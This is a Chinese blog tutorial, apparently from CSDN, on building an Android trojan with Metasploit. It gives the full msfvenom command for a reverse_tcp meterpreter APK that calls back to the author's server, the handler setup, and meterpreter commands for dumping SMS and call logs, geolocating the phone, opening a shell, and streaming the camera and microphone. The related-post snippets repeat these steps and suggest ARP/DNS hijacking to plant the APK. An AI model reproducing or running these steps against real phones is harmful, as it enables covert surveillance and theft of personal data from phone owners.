MSF渗透Android

已于 2024-05-28 16:14:47 修改
阅读量1.3k 收藏 22
点赞数 24
文章标签: 安全 linux android
于 2024-05-28 16:03:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yxisobai/article/details/139267147
版权

目录

一、云服务器配置

方法一:安装kali linux。因为服务商没有提供kali版本的系统版本,这里有个篇文章是用存储桶的方式制作kali镜像,通过自定义镜像安装《kali linux 云服务器,云服务器安装kali linux》。

方法二:安装centos 7 。在centos 7 上安装msf。安装方法

二、木马生成

三、渗透

四、msf常用命令:

五、总结:

记录一下学习渗透工具的使用。

原理:msf生成Android 后门木马,靶机运行木马实现反向链接攻击机。
靶机ip:随机

攻击机ip:111.229.***.*** (腾讯云服务器)

一、云服务器配置

方法一:安装kali linux。因为服务商没有提供kali版本的系统版本,这里有个篇文章是用存储桶的方式制作kali镜像,通过自定义镜像安装《kali linux 云服务器,云服务器安装kali linux》。

方法二:安装centos 7 。在centos 7 上安装msf。安装方法

渗透测试:CentOS 7 环境下 MSF 工具部署(Metasploit 渗透测试框架安装)》

二、木马生成

命令: msfvenom -p android/meterpreter/reverse_tcp LHOST= <本地ip>  LPORT=<本地端口号> R > <文件名>.apk
 

msfvenom -p android/meterpreter/reverse_tcp LHOST=111.229.***.*** LPORT=7788 R >test.apk

生成完成/root目录下生成test.apk

接下来就要把test.apk拿下来,发送到目标机上

我这里是用本地安装的kali虚拟机通过scp命令下载这个木马文件(因为本来就在本地安装过kali和xshell,所以就用scp和sz来传输文件,也可以用windows的cmd直接下载服务器文件:pscp命令,但是前提要安装PuTTY,并配置好环境变量)

scp root@111.229.***.***:/root/test.apk /root

sz /root/test.apk

这样文件就下载到本地了。接下来就是让靶机安装apk,并运行此apk。

三、渗透

服务器运行以下命令:

msfconsole #运行msf

 use exploit/multi/handler  #选择模块
 set payload android/meterpreter/reverse_tcp #选择攻击模块
 set LhOST 0.0.0.0 #填写自己主机的IP地址
 set lport 7788 #填写刚才生成木马时的端口号
 run

这样就是在进行监听了,现在就等靶机运行app。

当出现meterpreter>就说明已经渗透成功了。

dump_sms #获取所有短信

四、msf常用命令:

dump_calllog #获取通讯录
geolocate    #获取定位
shell        #运行靶机shell
webcam_chat  #与靶机视频
webcam_list  #获取靶机摄像头
webcam_stream #开启靶机摄像头监控
record_mic   #录音
webcam_snap  #拍照

五、总结:

网络软件不要乱下载,自己做测试的时候没做免杀手机能监测出病毒,但是被有心之人利用,通过捆绑,免杀等一系列操作,还是很难发现的。特别注意一下外挂等软件,xx助手等软件。 

Yang2023.
关注
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
m0_74914256的博客
05-05 2万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
MSF入侵安卓手机
2301_77162959的博客
07-11 1409
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
MSF渗透测试android手机
永远是少年
06-15 5135
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。 一、Android木马生成 二、Android木马安装 三、效果检验
深入探索:CentOS 7 环境下 Metasploit 渗透测试框架的完美部署
最新发布
gitblog_06579的博客
09-20 330
深入探索:CentOS 7 环境下 Metasploit 渗透测试框架的完美部署 渗透测试CentOS7环境下MSF工具部署Metasploit渗透测试框架安装 项目地址: https://gitcode.com/Resourc...
使用msf工具对安卓手机进行渗透攻击———超详细
热门推荐
weixin_71669458的博客
07-28 1万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
利用MSF攻击Android
qq_45746768的博客
07-08 3925
利用Metasploit攻击Android
msf渗透安卓机
weixin_30872499的博客
05-29 580
/*metasploit之远控*/msfconsole //开启metasploit模块/*根据自己的IP生成一个木马*/msfvenom -p 系统/meterpreter/reverse_tcp LHOST=IP LPORT = 端口 R> 文件名.exe(安卓.apk) use expolit/multi/handler //开启模块 show options //查看参数设置...
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 1215
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2561
使用msfvenom生成木马控制手机
msf渗透实验基本操作(上)
kiwifruit__的博客
11-23 4333
1.实验内容 (1)Metasploit主机扫描 (2)Metasploit漏洞利用 (3)Metasploit后渗透攻击 (4)Metasploit内网攻击 2.基本要求 (1)掌握Metasploit架构及使用流程; (2)掌握Metasploit主机扫描、漏洞利用; (3)掌握Metasploit后渗透攻击技术; (4)掌握Metasploit内网攻击及域渗透技术。 3.实验环境 vm虚拟机; kali2012,ip地址是192.168.70.128 win...
使用kali的msf渗透安卓手机
r7rrtyrytr的博客
01-30 3623
#1# 生成安卓手机木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=(本机ip) LPORT=4444 R > /home/kali/Desktop/111.apk apk生成后会保存在桌面上。 #2# 加载模块 use exploit/multi/handler #3# 选择Payload set payload android/meterpreter/reverse_tcp #4# 查看参数并设置 show o
msf生成安卓渗透
a439017985的博客
02-24 4223
利用msf来hack android 1.msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -o test.apk 2.签名(可以不用) 1.keytool -genkey -v -keystore my-release-key.keystore -alias pentest -keyalg R
Msf 入侵安卓手机
weixin_30378311的博客
09-21 1023
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 1.查看ip ifconfig 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribe...
MSF模拟渗透测试之攻击Android
lza20001103的博客
04-09 7164
MSF渗透测试系列之攻击Android
Kali Linux使用MSF木马入侵安卓手机
philip_z的博客
02-13 8619
Kali Linux使用MSF木马入侵安卓手机
MSF - Android
ShenMian000
10-05 847
更新中 Step 1 生成后门 msfvenom -p android/meterpreter/reverse_tcp LHOST=&amp;lt;本地IP&amp;gt; LPORT=&amp;lt;监听Port&amp;gt; R -o backdoor.apk 当目标执行后门时,MSF会向后门发送Payload。当Payload载入后即可开始控制目标。 Step 2 开启监听任务 msf &amp;gt; use use exp...
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 6230
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
KALI使用MSF攻击安卓设备
weixin_55357256的博客
07-10 2658
万事俱备,我们输入run来启动程序,输入完成后在手机上点击刚才我们装好的应用,注意,点开应用后不会有任何反应,但应用已经进入后台运行,不必重复打开!有很多人在这一步失败了,要么没反应,要么代码乱窜个不停,那就是网络或手机的问题。这期是kali使用MSF进行安卓渗透的保姆级别教程,话不多说,直接开始。现在准备工作做完了,我们下一步运行msfconsole。
在什么场景下可利用MSF攻击android
06-10
Metasploit Framework(MSF)是一款流行的渗透测试工具,可以用于评估系统和网络的安全性。在Android系统上,可以使用MSF来进行渗透测试,以发现系统中的漏洞和弱点。 在实际应用中,可以利用MSF来执行以下攻击: 1. 利用已知的Android漏洞进行攻击,例如利用Android系统中的漏洞来执行代码,获取系统权限或者泄露敏感信息。 2. 利用Android设备的一些弱点进行攻击,例如利用设备上未经认证的服务或者协议来攻击目标系统。 3. 利用社交工程学或者钓鱼攻击来欺骗Android设备用户,例如诱骗用户点击恶意链接或者下载安装恶意应用程序。 需要注意的是,使用MSF进行渗透测试需要遵守相关法律法规和道德规范,不得对未经授权的系统和网络进行攻击。任何违法行为都是不可取的,应该遵守法律法规,维护网络安全和社会公共利益。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yang2023.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值